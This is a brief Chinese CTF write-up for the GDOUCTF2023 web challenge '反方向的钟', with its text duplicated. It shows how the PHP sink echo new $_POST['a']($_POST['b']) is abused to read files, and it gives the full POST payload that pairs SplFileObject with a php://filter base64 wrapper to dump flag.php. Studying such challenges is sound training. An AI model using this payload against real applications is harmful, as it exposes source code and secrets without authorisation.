GDOUCTF2023-反方向的钟-wp
简单反序列化 关键在于怎么通过echo new $_POST['a']($_POST['b']);
来获取flag
1 |
|
这里要利用到php原生类 SplFileObject,可以读取文件内容,但只能输出一行 没办法输出flag
需要结合php伪协议
1 | a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php |
简单反序列化 关键在于怎么通过echo new $_POST['a']($_POST['b']);
来获取flag
1 |
|
这里要利用到php原生类 SplFileObject,可以读取文件内容,但只能输出一行 没办法输出flag
需要结合php伪协议
1 | a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php |